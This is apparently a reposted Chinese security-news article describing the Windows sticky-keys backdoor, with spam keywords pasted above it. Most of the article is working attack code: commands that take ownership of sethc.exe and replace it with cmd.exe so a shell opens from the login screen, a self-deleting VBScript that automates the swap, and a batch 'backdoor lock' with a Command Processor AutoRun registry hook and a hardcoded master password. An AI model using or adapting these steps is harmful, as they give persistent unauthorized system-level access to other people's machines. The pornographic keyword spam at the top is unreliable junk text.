偷偷摘套内射激情视频,久久精品99国产国产精,中文字幕无线乱码人妻,中文在线中文a,性爽19p

回顧曾經(jīng)酷的Windows后門入侵

安全 黑客攻防
此文章主要介紹的是變態(tài)入侵之有史以來最酷的Windows后門,其中包括后門原理,Windows后門擴(kuò)展等相關(guān)內(nèi)容的描述。

此文章主要講述的是變態(tài)入侵之有史以來最酷的Windows后門,本文主要闡述了有關(guān)Windows后門的一些知識(shí)。以下就是文章的主要內(nèi)容的詳細(xì)描述,望大家在瀏覽之后會(huì)對(duì)其有更深的了解。

后門原理:

 

在windows 2000/xp/vista下,按shift鍵5次,可以打開粘置,會(huì)運(yùn)行sethc.exe,而且,在登錄界面里也可以打開。這就讓人聯(lián)想到WINDOWS的屏保,將程序替換成cmd.exe后,就可以打開shell了。

XP:

將安裝源光盤彈出(或?qū)⒂脖P上的安裝目錄改名)

cd %widnir%\system32\dllcache

ren sethc.exe *.ex~

cd %widnir%\system32

copy /y cmd.exe sethc.exe

VISTA:

takeown /f c:\windows\system32\sethc.exe

cacls c:\windows\system32\sethc.exe /G administrator:F

然后按XP方法替換文件

在登錄界面按5此SHIFT,出來cmd shell,然后……

Windows后門擴(kuò)展:

Dim obj, success

Set obj = CreateObject("WScript.Shell")

success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe", 0, True)

success = obj.run("cmd /c echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F", 0, True)

success = obj.run("cmd /c copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe", 0, True)

success = obj.run("cmd /c copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe", 0, True)

success = obj.run("cmd /c del %SystemRoot%\system32\sethc.exe", 0, True)

success = obj.run("cmd /c ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)

第二句最有意思了.自動(dòng)應(yīng)答....以前就遇到過類似的問題

再更新.加個(gè)自刪除,簡(jiǎn)化代碼...

On Error Resume Next

Dim obj, success

Set obj = CreateObject("WScript.Shell")

success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F© %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe© %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)

CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)

Windows后門鎖擴(kuò)展:

allyesno注:可以采用cmd 鎖 來進(jìn)行cmdshell的密碼驗(yàn)證

用下面的后門鎖的方法是 把代碼保存為bdlock.bat

然后修改注冊(cè)表位置即可

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor]

"AutoRun"="bdlock.bat"

@Echo Off

title 后門登陸驗(yàn)證

color a

cls

set temprandom=%RANDOM%

echo 請(qǐng)輸入驗(yàn)證碼:%temprandom%

set/p check=

if "%check%"=="%temprandom%%temprandom%" goto passcheck

if "%check%"=="%temprandom%" (

rem 后門服務(wù)器驗(yàn)證

rem 如果沒有Windows后門驗(yàn)證服務(wù)器請(qǐng)rem注釋掉下一行代碼

if exist \192.168.8.8\backdoor$\pass goto passcheck

)

echo 驗(yàn)證失敗

pause

exit

:passcheck

echo 驗(yàn)證成功

If "%passcmdlock%"=="http://blog.csdn.net/freexploit/" Goto endx

Set passcmdlock=http://blog.csdn.net/freexploit/

:allyesno

Set Errorlevel=>nul

Echo 請(qǐng)輸入驗(yàn)證密碼?

Set password=allyesno Is a pig>nul

Set/p password=

rem 萬能密碼

if "%password%"=="allyesno is a sb" goto endx

If %time:~1,1%==0 Set timechange=a

If %time:~1,1%==1 Set timechange=b

If %time:~1,1%==2 Set timechange=c

If %time:~1,1%==3 Set timechange=d

If %time:~1,1%==4 Set timechange=e

If %time:~1,1%==5 Set timechange=f

If %time:~1,1%==6 Set timechange=g

If %time:~1,1%==7 Set timechange=h

If %time:~1,1%==8 Set timechange=i

If %time:~1,1%==9 Set timechange=j

set/a sum=%time:~1,1%+%time:~1,1%

Set password|findstr "^password=%timechange%%time:~1,1%%date:~8,2%%sum%$">nul

If "%errorlevel%"=="0" cls&Echo 口令正確&Goto End

Echo 請(qǐng)聯(lián)系客服咨詢正確密碼!&Goto allyesno

:End

Set password=>nul

Set Errorlevel=>nul

Echo

:endx

以上的相關(guān)內(nèi)容就是對(duì)變態(tài)入侵:有史以來最酷的Windows后門的介紹,望你能有所收獲。

 

責(zé)任編輯:佚名 來源: 豆瓣網(wǎng)
相關(guān)推薦

2010-09-09 19:43:29

2024-08-22 14:05:02

2014-06-19 15:44:31

2019-02-22 12:58:51

Windows 10微軟開始菜單

2011-03-31 09:25:13

2011-03-31 08:56:32

2011-03-31 09:25:06

2021-03-30 08:43:29

黑客PHP團(tuán)隊(duì)Git

2013-03-20 16:05:38

2009-03-10 13:08:56

2011-03-15 14:31:32

2013-09-11 14:00:16

Windows 8.1

2009-11-25 09:11:30

2019-02-26 14:39:20

Windows后門漏洞

2011-03-31 09:25:10

2009-07-19 11:13:52

windows后門安全

2021-04-19 08:02:54

Windows手工入侵

2013-10-20 17:07:27

2009-07-24 18:30:33

2011-03-15 15:41:43

點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)